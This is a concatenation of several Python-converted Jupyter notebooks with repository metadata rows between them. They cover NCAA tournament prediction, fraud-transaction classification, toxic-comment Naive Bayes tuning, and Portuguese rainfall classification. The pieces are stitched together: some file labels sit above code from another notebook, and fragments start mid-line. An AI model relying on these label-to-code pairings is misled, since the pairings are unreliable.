history = network.fit(x_train, y_train,
epochs=50, verbose=1, batch_size=2)
loss, accuracy = network.evaluate(x_test, y_test)
# evaluate and store the accuracy
# loss, accuracy = model.evaluate(xtest_imagelist, ytest, verbose=1)
avg_loss.append(loss)
avg_acc.append(accuracy)
# cross validation score
print("Average accuracy of model on the dev set = ", np.mean(avg_acc))
# -
# create an array of shape 30706, 9 = number of records by the features
my_data = np.array([[0 for x in range(8)] for y in range(len(dataDF))])
for i in range(len(dataDF)):
my_data[i] = [dataDF.delta.values[i],
dataDF.theta.values[i],
dataDF.alphaLow.values[i],
dataDF.alphaHigh.values[i],
dataDF.betaLow.values[i],
dataDF.betaHigh.values[i],
dataDF.gammaLow.values[i],
dataDF.gammaMid.values[i]]
my_data[0]
d = scaler.transform(my_data)
d[0]
dataDF
| 23,427 |
/Fraudulent_Transaction_Detection.ipynb
|
2bac75c7815ab583c2d4eab573ecd891f99e727f
|
[] |
no_license
|
amanrajdce/Fraud-Detector
|
https://github.com/amanrajdce/Fraud-Detector
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 251,460 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
from pandas import DataFrame
import numpy as np
import sklearn
from sklearn.model_selection import train_test_split
from sklearn import tree
from sklearn.tree import DecisionTreeClassifier
from sklearn.tree import export_graphviz
from io import StringIO
import pydotplus
from IPython.display import Image
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import roc_auc_score
# +
## Data Cleaning & Preparation
# -
df = pd.read_csv("NCAA_Tourney_2002_2019_update.csv")
df_clean = df.copy()
df_clean.head(3)
# +
# %matplotlib inline
import matplotlib.pyplot as plt
plt.style.use('ggplot')
from math import sin, cos, sqrt, atan2, radians
import numpy as np
import pandas as pd
import random
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import (auc, classification_report, roc_auc_score, accuracy_score,
f1_score, log_loss, roc_curve, confusion_matrix, precision_score, recall_score)
from sklearn.preprocessing import StandardScaler
import statsmodels.api as sm
df_cut = df[[ "team1_teamname", "team1_score", "team2_teamname","team2_score"]]
df_cut["team1_spead"] = df_cut["team1_score"] - df_cut["team2_score"]
df_cut["team2_spead"] = -df_cut["team1_spead"]
df_cut.tail()
teams = pd.concat([
df_cut[['team1_teamname', 'team1_spead','team2_teamname']].rename(columns={'team1_teamname': 'team', 'team1_spead': 'spread', 'team2_teamname': 'opponent'}),
df_cut[['team2_teamname', 'team2_spead','team1_teamname']].rename(columns={'team2_teamname': 'team', 'team2_spead': 'spread', 'team1_teamname': 'opponent'})
])
teams.tail()
import numpy as np
teams['spread'] = np.where(teams['spread'] > 15, 15, teams['spread'])
teams['spread'] = np.where(teams['spread'] < -15, -15, teams['spread'])
spreads = teams.groupby('team').spread.mean()
spreads
terms = []
solutions = []
for team in spreads.keys():
row = []
# get a list of team opponents
opps = list(teams[teams['team'] == team]['opponent'])
for opp in spreads.keys():
if opp == team:
# coefficient for the team should be 1
row.append(1)
elif opp in opps:
# coefficient for opponents should be 1 over the number of opponents
row.append(-1.0/len(opps))
else:
# teams not faced get a coefficient of 0
row.append(0)
terms.append(row)
# average game spread on the other side of the equation
solutions.append(spreads[team])
solutions = np.linalg.solve(np.array(terms), np.array(solutions))
ratings = list(zip( spreads.keys(), solutions ))
srs = pd.DataFrame(ratings, columns=['team', 'rating'])
srs.head()
rankings = srs.sort_values('rating', ascending=False).reset_index()[['team', 'rating']]
rankings.loc[:10]
team_list = list(rankings['team'])
rating_list = list(rankings['rating'])
team1_rating = []
team1_namelist = list(df['team1_teamname'])
for i in team1_namelist:
unique_index = pd.Index(team_list)
team_index = unique_index.get_loc(i)
team_rating = rating_list[team_index]
team1_rating.append(team_rating)
team2_rating = []
team2_namelist = list(df['team2_teamname'])
for i in team2_namelist:
unique_index = pd.Index(team_list)
team_index = unique_index.get_loc(i)
team_rating = rating_list[team_index]
team2_rating.append(team_rating)
rating_diff = []
for i in range(len(team1_rating)):
game_rating_diff = team1_rating[i] - team2_rating[i]
rating_diff.append(game_rating_diff)
rating_compare = []
for i in rating_diff:
if i > 2:
rating_compare.append(1)
elif i < -2:
rating_compare.append(-1)
else:
rating_compare.append(0)
df['rating_diff'] = rating_compare
df['rating_diff'].value_counts()
def distance(lat1, lon1, lat2, lon2):
# approximate radius of earth in km
R = 6373.0
lat1 = radians(lat1)
lon1 = radians(lon1)
lat2 = radians(lat2)
lon2 = radians(lon2)
dlon = lon2 - lon1
dlat = lat2 - lat1
a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2
c = 2 * atan2(sqrt(a), sqrt(1 - a))
distance = R * c
return distance
df['dist1'] = df.apply(lambda row: distance(row['host_lat'], row['host_long'], row['team1_lat'], row['team1_long']), axis=1)
df['dist2'] = df.apply(lambda row: distance(row['host_lat'], row['host_long'], row['team2_lat'], row['team2_long']), axis=1)
df['diff_dist'] = df['dist1'] - df['dist2']
df['exp_win1'] = (df['team1_adjoe']**11.5)/ ((df['team1_adjde']**11.5)+(df['team1_adjoe']**11.5))
df['exp_win2'] = (df['team2_adjoe']**11.5)/ ((df['team2_adjde']**11.5)+(df['team2_adjoe']**11.5))
#Log 5 is a formula invented by Bill James[1] to estimate the probability that team A will win a game, based on the true winning percentage of Team A and Team B.
df['team1_log5'] = (df['exp_win1'] - (df['exp_win1']*df['exp_win2']))/ (df['exp_win1']+df['exp_win2']-(2*df['exp_win1']*df['exp_win2']))
seed_diff = list(df['team1_seed'] - df['team2_seed'])
seed_compare = []
for i in seed_diff:
if i >= 4:
seed_compare.append(1)
elif i <= -4:
seed_compare.append(-1)
else:
seed_compare.append(0)
df['seed_diff'] = seed_compare
df['seed_diff'].value_counts()
df['team1_win'] = (df['team1_score']>df['team2_score']).astype(int)
def tran(x):
if x != 0:
return 1
else:
return 0
df['team1_ff'] = df['team1_pt_overall_ff'].apply(tran)
df['team2_ff'] = df['team2_pt_overall_ff'].apply(tran)
df['ff_diff'] = df['team1_ff'] - df['team2_ff']
df['ff_diff'].value_counts()
np.random.seed(0)
def shuffle(df):
df = df.reindex(np.random.permutation(df.index)).copy()
return df.reset_index(drop=True)
random_indices = random.sample(range(len(df)), int(len(df)/2))
df_1 = df[~df.index.isin(random_indices)][['game_id','season','team1_win','exp_win1','exp_win2','team2_score', 'team1_score','diff_dist','team1_log5','team1_id','team2_id','seed_diff', 'ff_diff','rating_diff']].reset_index(drop=True)
df_2 = df[df.index.isin(random_indices)][['game_id','season','team1_win','exp_win1','exp_win2','team2_score','team1_score','diff_dist','team1_log5','team1_id','team2_id','seed_diff', 'ff_diff','rating_diff']].reset_index(drop=True)
df_2['team1_win'] = df['team1_win'].apply(lambda x: 1 if x==0 else 0)
df_2['diff_dist'] = df['diff_dist']*-1
df_2['ff_diff'] = df['ff_diff']*-1
df_2['seed_diff'] = df['seed_diff']*-1
df_2['rating_diff'] = df['rating_diff']*-1
df_2['team1_log5'] = (df['exp_win2'] - (df['exp_win1']*df['exp_win2']))/ (df['exp_win1']+df['exp_win2']-(2*df['exp_win1']*df['exp_win2']))
df_2.columns = ['game_id', 'season', 'team1_win', 'exp_win2', 'exp_win1', 'team1_score', 'team2_score', 'diff_dist', 'team1_log5',
'team2_id', 'team1_id','seed_diff', 'ff_diff','rating_diff']
df_2['team1_win'].value_counts()
df_1['team1_win'].value_counts()
mm_train = pd.concat([df_2, df_1])
mm_data_2019 = mm_train[mm_train['season'] == 2019].reset_index(drop=True)
mm_data_else = mm_train[mm_train['season'] != 2019].reset_index(drop=True)
# -
y_test = mm_data_2019['team1_win']
x_test = mm_data_2019[['ff_diff','seed_diff','diff_dist','team1_log5','rating_diff']]
y_train = mm_data_else['team1_win']
x_train = mm_data_else[['ff_diff','seed_diff','diff_dist','team1_log5','rating_diff']]
y = y_train
X = x_train
def summary_tree(model_object):
dot_data = StringIO()
export_graphviz(model_object, out_file=dot_data, filled=True,
rounded=True, special_characters=True, feature_names=X.columns.values,
class_names=['0', '1'])
graph = pydotplus.graph_from_dot_data(dot_data.getvalue())
output_imagefile = 'tree.png'
graph.write_png(output_imagefile)
return output_imagefile
# +
# Depth level of the Classification Tree
kfolds = 5
maximum_depth = 100
minimum_depth = 1
param_grid = {'max_depth':list(range(minimum_depth, maximum_depth+1))}
# -
gridsearch = GridSearchCV(DecisionTreeClassifier(criterion='entropy', random_state=1), param_grid, scoring='roc_auc', cv=kfolds, n_jobs=-1)
gridsearch.fit(X,y)
clf_BPT = gridsearch.best_estimator_
Image(summary_tree(clf_BPT))
print(clf_BPT.get_depth())
y_test_actual = mm_data_2019['team1_win']
X_test = mm_data_2019[['ff_diff','seed_diff','diff_dist','team1_log5','rating_diff']]
from sklearn.metrics import roc_auc_score
print(roc_auc_score(y_test_actual, clf_BPT.predict_proba(X_test)[:,1]))
predict_proba = clf_BPT.predict_proba(X_test)
log_loss(y_test, predict_proba)
# +
def get_treepaths(dtc, df):
rules_list = []
values_path = []
values = dtc.tree_.value
def RevTraverseTree(tree, node, rules, pathValues):
try:
prevnode = tree[2].index(node)
leftright = '<='
pathValues.append(values[prevnode])
except ValueError:
# failed, so find it as a right node - if this also causes an exception, something's really f'd up
prevnode = tree[3].index(node)
leftright = '>'
pathValues.append(values[prevnode])
# now let's get the rule that caused prevnode to -> node
p1 = df.columns[tree[0][prevnode]]
p2 = tree[1][prevnode]
rules.append(str(p1) + ' ' + leftright + ' ' + str(p2))
# if we've not yet reached the top, go up the tree one more step
if prevnode != 0:
RevTraverseTree(tree, prevnode, rules, pathValues)
# get the nodes which are leaves
leaves = dtc.tree_.children_left == -1
leaves = np.arange(0,dtc.tree_.node_count)[leaves]
# build a simpler tree as a nested list: [split feature, split threshold, left node, right node]
thistree = [dtc.tree_.feature.tolist()]
thistree.append(dtc.tree_.threshold.tolist())
thistree.append(dtc.tree_.children_left.tolist())
thistree.append(dtc.tree_.children_right.tolist())
# get the decision rules for each leaf node & apply them
for (ind,nod) in enumerate(leaves):
# get the decision rules
rules = []
pathValues = []
RevTraverseTree(thistree, nod, rules, pathValues)
pathValues.insert(0, values[nod])
pathValues = list(reversed(pathValues))
rules = list(reversed(rules))
rules_list.append(rules)
values_path.append(pathValues)
for i in range(len(rules_list)):
print('\nLeaf node ID =', i+1)
print('Path =', rules_list[i])
distro = sum(values_path[i][-1])
print('sample =', int(sum(distro)))
print('value =', list([int(distro[0]), int(distro[1])]))
predicted_class = 1 if distro[1] > distro[0] else 0
print('class = ', predicted_class)
return None
get_treepaths(dtc=clf_BPT, df= mm_data_2019)
# -
el("Time of the day (0-23)")
plt.ylabel("Number of Frauds")
plt.show()
# Since all the 24 bins corresponding to the 24 hours seem to have almost the same number of entries, it seems unlinkely that step_bin will be useful in detecting frauds. Hence, we drop this column
X.drop(['step', 'step_bin'], axis=1, inplace=True)
# ### Final X before feature engineering
X.head()
# ### 4. Feature Engineering
# #### Checking if the accounts are balanced in origin and destination after the transaction can possibly be a good indicator of fraud.
X['errorOrig'] = X['newBalanceOrig'] + X['amount'] - X['oldBalanceOrig']
X['errorDest'] = X['oldBalanceDest'] + X['amount'] - X['newBalanceDest']
print("Account not balanced in Orig:", len(X[X['errorOrig'] != 0])/ len(X))
print("Account not balanced in Dest:", len(X[X['errorDest'] != 0])/ len(X))
# Since a significant proportion of accounts are not balanced, it makes sense to use them as new features
plt.figure()
plt.title("Correlation among different features before modelling")
corelation = round(X.corr(), 2)
sns.heatmap(corelation, center=0, linewidths=.1, linecolor='white', cmap="YlGnBu", annot=True)
plt.show()
# ### 5. Model Selection
# #### Preparing the dataset
y = X['isFraud']
X.drop(['isFraud'], axis=1, inplace=True)
print("Size of dataset:{}".format(len(X)))
# #### Train, Test Split and Normalizing the dataset
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
scaler = StandardScaler().fit(X_train)
X_train_norm = scaler.transform(X_train)
X_test_norm = scaler.transform(X_test)
def calculate_metrics(clf, Xtest, Ytest):
y_true, y_pred = Ytest, clf.predict(Xtest)
print(classification_report(y_true, y_pred))
acc = clf.score(Xtest, Ytest)
avg_prec_score = average_precision_score(y_true, y_pred)
print("Accuracy:{}, Average Precision Score:{}".format(acc, avg_prec_score))
return acc, avg_prec_score
# #### Using a dummy classifier to set a baseline
# We use aaccuracy and average precision rate as performance metrics. Accuracy is not reliable in this case as we have a very skewed data set. So alternate metrics like AUC curve, average precision rate, etc are used.
dummy_clf = DummyClassifier().fit(X_train_norm, y_train)
dc_acc, dc_aps = calculate_metrics(dummy_clf, X_test_norm, y_test)
# Clearly, even a dummy classifier can have a very high accuracy but neglegible average precision score.
# To begin with, we start with a very basic classifier
#
# ### Gaussian Naive Bayes Classifier
nb = GaussianNB().fit(X_train_norm, y_train)
nb_acc, nb_aps = calculate_metrics(nb, X_test_norm, y_test)
# With Naive Bayes' we get a slight improvement in average precision, however, accuracy goes down. Clearly Gaussian assumption for the data is not valid.
# ### Logistic Regression Classifier
lr = LogisticRegressionCV(cv=5, random_state=0).fit(X_train_norm, y_train)
lr_acc, lr_aps = calculate_metrics(lr, X_test_norm, y_test)
# Logistic Regression is quite good for binary classification. In this case, it gives both better accuracy and average precision than both Dummy and Naive Bayes' clasifier
# ### XG Boost
xgb = XGBClassifier().fit(X_train, y_train)
xgb_acc, xgb_aps = calculate_metrics(xgb, X_test, y_test)
# ### Random Forest Classifier
rf = RandomForestClassifier(n_estimators=10).fit(X_train, y_train)
rf_acc, rf_aps = calculate_metrics(rf, X_test, y_test)
# ### LDA
lda = LinearDiscriminantAnalysis().fit(X_train_norm, y_train)
lda_acc, lda_aps = calculate_metrics(lda, X_test_norm, y_test)
# +
plt.rcdefaults()
fig, ax = plt.subplots()
# Classifier names
clas = ('Dummy', 'Gaussian NB', 'LDA', 'Logistic Regression', 'XGBoost', 'Random Forest')
performance = [dc_aps, nb_aps, lda_aps, lr_aps, xgb_aps, rf_aps]
y_pos = np.arange(len(clas))
ax.barh(y_pos, performance, align='center',
color='green')
ax.set_yticks(y_pos)
ax.set_yticklabels(clas)
ax.invert_yaxis()
ax.set_xlabel('Average Precision Score')
ax.set_title('Average precision score for all classifiers')
plt.show()
# -
| 15,061 |
/Precipitacao.ipynb
|
2740947ed35c749c47603adc5f6406253bf2ce89
|
[] |
no_license
|
Puppim/Data-Science
|
https://github.com/Puppim/Data-Science
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 555,822 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# #### Improving M000 (log loss: 0.320) by changing MultinomialNB hyperparameters / vectorization
# +
import sys
sys.path.append('..')
from __future__ import division, print_function
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer, TfidfTransformer
from sklearn.naive_bayes import BernoulliNB, MultinomialNB
from sklearn.multiclass import OneVsRestClassifier
from sklearn.feature_selection import chi2, mutual_info_classif, SelectKBest
from sklearn.model_selection import cross_val_score
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import binarize
from sklearn.metrics import log_loss
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from collections import defaultdict
# %matplotlib inline
# %load_ext autoreload
# %autoreload 2
from evaluation import cross_validate_multilabel, multilabel_results
# -
# Define classes and load test/train data, some input text is "N/A" so turn na_filter off to prevent this being converted to NaN
# +
toxic_classes = [
'toxic', 'severe_toxic', 'obscene',
'threat', 'insult', 'identity_hate'
]
df = pd.read_csv('../data/train.csv', na_filter=False)
X_text = df['comment_text'].values
Y = df[toxic_classes].values
ids = df['id']
# -
# ### [1] Feature reduction
# To improve our model accuracy we will first try reducing the number of features.
#
# Each feature is a single token (word) found within the training data, the feature value is the count of that token within the document record, i.e. how many times a word appeared in a particular comment
#
# The majority of these words will not be useful in making predictions, and whilst these non-discriminative features should affect each class equally, their inclusion can still result in negative performance.
#
# #### [1a] Drop low frequency tokens
# First we will remove words that only appear in a small number of documents, as their class conditional probabilities will be less reliable.
#
# Plotting histogram showing the token frequency distribution (x-axis: number of documents that token appears in, y-axis: number of tokens with given document frequency)
X = CountVectorizer(binary=True).fit_transform(X_text) # binarize features for easy histogram
document_frequency = np.asarray(X.sum(axis=0)).flatten()
plt.hist(document_frequency, bins=1000)
plt.yscale('log')
plt.show()
# It is quite clear that the mast majority of features only appear in a small number of documents (~1) so we will model performance when setting a minimum document frequency (expressed as an integer document count).
# +
results = []
min_dfs = [1, 10, 100, 1000, 5000, 10000, 20000, 30000, 40000, 50000, 60000]
for min_df in min_dfs:
cvec = CountVectorizer(min_df=min_df)
X = cvec.fit_transform(X_text)
cv_scores = cross_validate_multilabel(MultinomialNB(), X, Y, cv=10, scoring='neg_log_loss')
results.append(list(cv_scores))
print('min_df:', min_df, '|', 'number of features:', len(cvec.vocabulary_))
multilabel_results(results, toxic_classes, min_dfs)
# -
# Suprisingly, our best result comes from the model which has features with a minumum document frequent of 60,000. In this model we only have one feature...
cvec = CountVectorizer(min_df=60000)
X = cvec.fit_transform(X_text)
cvec.vocabulary_
# The token 'the' is unlikely to discrimate between classes, as it is so common. The most likely explanation here is that we are simply getting a "null" model which has a probability equal to the class prior: the likelihood of observing an example in a class (class marginal probability)
#
# In other words for models with only very frequent, in the Bayes numerator `P(x|y)P(y)` then `P(x|y)` will be `~P(x)` (essentially independant of class) and the so `P(y)` will become the dominant term.
#
# Our single feature model goes one step further and `P(x|y)` = 1 for both classes (sum of feature / sum of all features = 1) and so we should get a constant probability for all records (equal to the class prior)
mnb = MultinomialNB()
mnb.fit(X, Y[:, 0])
probs = mnb.predict_proba(X)[:,1]
probs.min() == probs.max()
# Checking the proportion of records which have each class attribute
Y.sum(axis=0) / Y.shape[0]
# So we are dealing with very imbalanced classes, and in our class specific (one vs rest) models the class prior for the negative case will always dominate. We are essentially just prediction "not toxic"" for every record and getting the best result because "not toxic" and getting a *good* result because that is the most likely class.
#
# This model be our new baseline (log_loss: **0.141**)
# #### [1b] Select "best" features
#
# Rather than dropping features which have a low rate of occurence, we will try to select the features which will best discriminate between classes prior to fitting the model.
#
# We use a chi2 test for independance which compares the joint probability `P(x|y)` with `P(x)` and ranks the features which have the highest different between the conditional and marginal probabilities.
#
# For example if:
# * `P('idiot')` = 0.1 and `P('idiot'|'toxic')` = 0.6
# * `P('dog')` = 0.01 and `P('idiot'|'toxic')` = 0.15<br>
#
# Then **idiot** will have a larger chi2 value.
#
# (The actual chi2 calculation actually considers an average across all combinations of `P('idiot'|'toxic'), P('idiot'|'not_toxic'), P('not_idiot'|'toxic'), P('not_idiot'|'not_toxic')`)
def kbest_feature_names(class_labels, kbest_per_class, cvec):
# finding names of top kbest features
kbest_features = defaultdict(list)
for toxic_class, kbest in zip(class_labels, kbest_per_class):
indices = kbest.get_support(indices=True)
scores = kbest.scores_
sorted_indices = [index for index, score in sorted(zip(indices, scores), key=lambda x: x[1])]
for index in sorted_indices:
kbest_features[toxic_class].append(cvec.get_feature_names()[index])
return pd.DataFrame(kbest_features)
cvec = CountVectorizer()
X = cvec.fit_transform(X_text)
kbest_per_class = [SelectKBest(chi2, k=15).fit(X, y) for y in Y.T]
# Before fitting any models here are the top features per class according to chi2 value
kbest_feature_names(toxic_classes, kbest_per_class, cvec)
# Most of these results seem logical and are tokens you would normally associate with toxic comments, however we are getting a few spurious results likely caused by low frequency tokens so we will rerun using a small cut-off for rare tokens.
cvec = CountVectorizer(min_df=10)
X = cvec.fit_transform(X_text)
kbest_per_class = [SelectKBest(chi2, k=15).fit(X, y) for y in Y.T]
kbest_feature_names(toxic_classes, kbest_per_class, cvec)
# These results look more robust. Whilst we see some of the same tokens being the best feature for multiple classes, there does seem to be a general theme in most cases. For example most of the top features in "identity_hate" target ethnicity / orientation etc.
#
# Will now try fitting models with only k best features retained, note that chi2 will be calculated within the cross-validation folds to avoid information from the full set leaking into the model.
def kbest_pipeline(k, classifier):
return Pipeline([
('kbest', SelectKBest(chi2, k=k)),
('classifier', classifier)
])
# +
results = []
kbest = [1,5,10,20,30,40,50,60,70,80,90,100]
cvec = CountVectorizer(min_df=10)
X = cvec.fit_transform(X_text)
for k in kbest:
cv_scores = cross_validate_multilabel(kbest_pipeline(k, MultinomialNB()), X, Y, cv=10, scoring='neg_log_loss')
results.append(list(cv_scores))
print('kbest:', k)
# -
multilabel_results(results, toxic_classes, kbest)
# Whilst selecting top features gave us a minor improvement (k=30) the performance appears to still impacted by the class imbalance. This is most noticeable in the classes which have the smallest proportion of positive samples (e.g. identity hate) we are actually getting a worse result by adding token features to the model.
#
# This is because the class prior is most influential in these cases and will still achieve the best result by essentially assuming all cases are negative.
#
# Will try re-running the last test with uniform class priors, although will likely get a worse result as we assuming the marginal `P(yi)` = `P(not_yi)` (n.b. Using larger k values as we no longer have reliable prior)
# +
results = []
kbest = [50,100,200,300,500,750,1000]
cvec = CountVectorizer(min_df=10)
X = cvec.fit_transform(X_text)
for k in kbest:
cv_scores = cross_validate_multilabel(kbest_pipeline(k, MultinomialNB(fit_prior=False)), X, Y, cv=10, scoring='neg_log_loss')
results.append(list(cv_scores))
print('kbest:', k)
# -
multilabel_results(results, toxic_classes, kbest)
# As expected results are worse, to avoid this we need to find a way of making the class prior less influential, but not ignored completely.
#
# Will explore a different approach using a logistic regression from the a Kaggle kernel that achieved log_loss of 0.052 in notebooks d002 to see if we can identify the reason for the increased performance.
y=[dfdd['Data'].dt.year,dfdd['Data'].dt.month]).mean().sort_values(by="TempMinima")
# <a id='insight06'></a>
# ### Comportamento cíclico da média das features/ano
# Nota-se um compotamento cíclico apesar de haver variação na média dos anos
dfdd.loc[dfdd['Data'].dt.year == 2017].mean()
dfdd.loc[dfdd['Data'].dt.year == 2018].mean()
dfdd.loc[dfdd['Data'].dt.year == 2017].mean().plot(figsize=(20,12))
dfdd.loc[dfdd['Data'].dt.year == 2018].mean().plot(figsize=(20,12))
#
# # 2) Pré-processamento
#
#
# ## Dataset sem imputação de dados
#
# Para construir um dataset apenas com valores fornecidos utilizaremos a união dos dois dataset de dados_diarios.txt e dados_horarios.txt
# +
dfdd = pd.read_csv('dados_diarios_semcab.txt', sep=";")
dfdd.drop(['Unnamed: 11','Estacao'], inplace=True, axis=1) # limpeza de colunas sem informacao
dfdh = pd.read_csv("dados_horarios_semcab.txt", sep = ";")
dfdh.drop(['Unnamed: 9','Unnamed: 10'], inplace=True, axis=1) # limpeza da coluna sem informacao
dfdd.Data = pd.to_datetime(dfdd.Data)
dfdh.Data = pd.to_datetime(dfdh.Data)
dfmerge = pd.merge(dfdd,dfdh,how='inner', on=['Data','Hora'])
dfmerge.sort_values(by="Data")
dfmerge
# -
dfpre=dfmerge.dropna(subset=["Precipitacao"])
dfpre
dfpre.drop(['Hora','TempMaxima','Insolacao','Evaporacao Piche', 'Temp Comp Media','Umidade Relativa Media','Velocidade do Vento Media','Estacao'], inplace=True, axis=1)
dfpre
dfpre.to_csv("ddreais.csv") #salvando em ddreais.csv"
dfpre.Data = pd.to_datetime(dfpre.Data)
dfpre.dtypes
# ## Dataset com imputação dos valores ausentes
# Esse tipo de dataset com imputação apresenta um viés forte da estratégia de utilizada para para a imputação
# dos valores faltantes.
#
# Técnicas de utilização de aprendizagem de máquina para essa imputação não fazem sentido como mencionado, pois a própria classe de interese está faltante em 50% dos dados.
#
# Analisando o dataset dados_diarios_semcab.txt vemos um padrão que toda linha 2n+1 apresenta valor de "Precipitacao e TemMinima" e nas 2n os demais valores, com um merge dessas tuplas com valores de 00:00 e 12:00 teríamos um dataset sem tantos valores ausentes. Essa estratégia se baseia em considerar que não há variações climáticas bruscas de um dia para o outro.
#
# Outra estratégia é considerar que esses dados apresentam baixa variação em seus valores antecessor e sucessor, visto que, pelo desvio padrão e por apresentar um acréscimo e decréscimo sequencial utilizaremos a estratégia da interpolação para fugir da ideia de fazer um merge entre dois horários diferentes. Utilizaremos essa segunda estratégia de imputação.
dfdd = pd.read_csv('dados_diarios_semcab.txt', sep=";")
dfdd.drop(['Unnamed: 11','Estacao'], inplace=True, axis=1) # limpeza de colunas sem informacao
dfdd = dfdd.interpolate(method='linear', limit_direction='forward', axis=0)
dfdd
# Vamo retirar também "temp Com Media" como visto na Etapa de AED
dfdd.drop(['Temp Comp Media'], inplace=True, axis=1)
dfdd
# +
dfdh = pd.read_csv("dados_horarios_semcab.txt", sep = ";")
dfdh.drop(['Unnamed: 9','Unnamed: 10'], inplace=True, axis=1) # limpeza da coluna sem informacao
dfdd.Data = pd.to_datetime(dfdd.Data)
dfdh.Data = pd.to_datetime(dfdh.Data)
dfmergeimp = pd.merge(dfdd,dfdh,how='inner', on=['Data','Hora'])
dfmergeimp.sort_values(by="Data")
# -
dfmergeimp.to_csv("dfimput.csv") #salvando em ddreais.csv"
# # 3) Etapas do machine learning
#
# ## Carregamento dos Dataset
dfimput = pd.read_csv("dfimput.csv", sep = ",")
dfimput.drop(['Unnamed: 0','Estacao'], inplace=True, axis=1) # limpeza da coluna sem informacao
dfimput
# +
dfreais = pd.read_csv("ddreais.csv", sep = ",")
dfreais.drop(['Unnamed: 0'], inplace=True, axis=1) # limpeza da coluna sem informacao
dfreais
# -
# ## Discretização
#
# Poderíamos usar os valores reais em "mm" da precipitação ou então discretizar de acordo com o tipo de precipitação, por exemplo:
#
# #### Classificação por intensidade da chuva
#
# classes: Dia Seco (DS): P < 2,2;
#
# Chuva muito fraca (Cmf): 2,2 ≤ P < 4,2;
#
# Chuva fraca (Cf): 4,2 ≤ P < 8,4;
#
# Chuva Moderada (CM): 8,4 ≤ P < 18,6;
#
# Chuva Forte (CF): 18,6 ≤ P < 55,3;
#
# Chuva Muito Forte (CMF): P ≥ 55,3.
#
# fonte :https://periodicos.ufpe.br/revistas/rbgfe/article/view/232788
#
# ### Entretanto vamos apenas focar no escopo do projeto que é responder qual a probabilidade de chover em um certo dia, dada as condições climáticas.
# +
for index, row in dfreais.iterrows(): # Substitui os valores da coluna Precipitacao por SIM se valor > 0 e NAO se menos
if row['Precipitacao'] > 2.2:
dfreais.loc[index,'Precipitacao'] = "chuva"
else:
dfreais.loc[index,'Precipitacao'] = "seco"
dfreais
# +
for index, row in dfimput.iterrows(): # Substitui os valores da coluna Precipitacao por SIM se valor > 0 e NAO se menos
if row['Precipitacao'] > 2.2:
dfimput.loc[index,'Precipitacao'] = "chuva"
else:
dfimput.loc[index,'Precipitacao'] = "seco"
dfimput
# -
# ## Balanceamento dos dados
#
# O ideia é deixar o dataset balanceado como mostrado abaixo,
# fazendo um <i>Undersampling</i> perdemos muitas instâncias e, por outro lado, se
# usarmos o <i>oversampling</i> podemos influenciar demais na etapa de aprendizado.
# Nos casos de dataset que necessitam de balanceamento, a porcentagem das
# classes também sao fatores de <i>tuning</i>.
#
# Neste caso, devido à grande queda de instância, provalvemente seria
# melhor o uso de um algoritmo mais robusto à classe desbalanceadas como, baseados
# no paradgma simbólico ou modelos que fazem essa penalização como penalized-SVM e penalized-LDA
print(dfimput.groupby('Precipitacao').size())
print(dfreais.groupby('Precipitacao').size())
# +
dfreais['Precipitacao'].hist(figsize=(6,6)) # classes totalmente desbalanceada
plt.show()
# -
dfimput['Precipitacao'].hist(figsize=(6,6)) # classes totalmente desbalanceada
plt.show()
# Como visto pelos histogramas temos muita instância da classe seco e pouca da classe chuva.
# +
count_class_0, count_class_1 = dfimput.Precipitacao.value_counts()
df_class_0 = dfimput[dfimput['Precipitacao'] == "seco"]
df_class_1 = dfimput[dfimput['Precipitacao'] == "chuva"]
df_class_0_under = df_class_0.sample(count_class_1)
dfimput_under = pd.concat([df_class_0_under, df_class_1], axis=0)
print('Random under-sampling:')
print(dfimput_under.Precipitacao.value_counts())
dfimput_under.Precipitacao.value_counts().plot(kind='bar', title='Total de Precipitacao por classe');
# +
count_class_0, count_class_1 = dfreais.Precipitacao.value_counts()
df_class_0 = dfreais[dfreais['Precipitacao'] == "seco"]
df_class_1 = dfreais[dfreais['Precipitacao'] == "chuva"]
df_class_0_under = df_class_0.sample(count_class_1)
dfreais_under = pd.concat([df_class_0_under, df_class_1], axis=0)
print('Random under-sampling:')
print(dfreais_under.Precipitacao.value_counts())
dfreais_under.Precipitacao.value_counts().plot(kind='bar', title='Total de Precipitacao por classe');
# -
# ### Importação da biblioteca
# +
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
# -
# ### Split do dataset
# ### Escolha entre A)(real) ou B)(artificial) :
# ##### A) Dataset sem imputação dos valores ausentes
# +
array = dfreais_under.values
X = array[:,2:9]
y = array[:,1]
X_train, X_validation, Y_train, Y_validation = train_test_split(X, y, test_size=0.20, random_state=1)
# -
# ##### b) Dataset com imputação dos valores ausentes
# +
array = dfimput_under.values
X = array[:,3:14]
y = array[:,2]
X_train, X_validation, Y_train, Y_validation = train_test_split(X, y, test_size=0.20, random_state=1)
# -
# ### Elaboração do model
# +
models = []
models.append(('LR', LogisticRegression(solver='liblinear', multi_class='ovr')))
models.append(('LDA', LinearDiscriminantAnalysis()))
models.append(('KNN', KNeighborsClassifier()))
models.append(('CART', DecisionTreeClassifier()))
models.append(('NB', GaussianNB()))
models.append(('SVM', SVC(gamma='auto')))
results = []
names = []
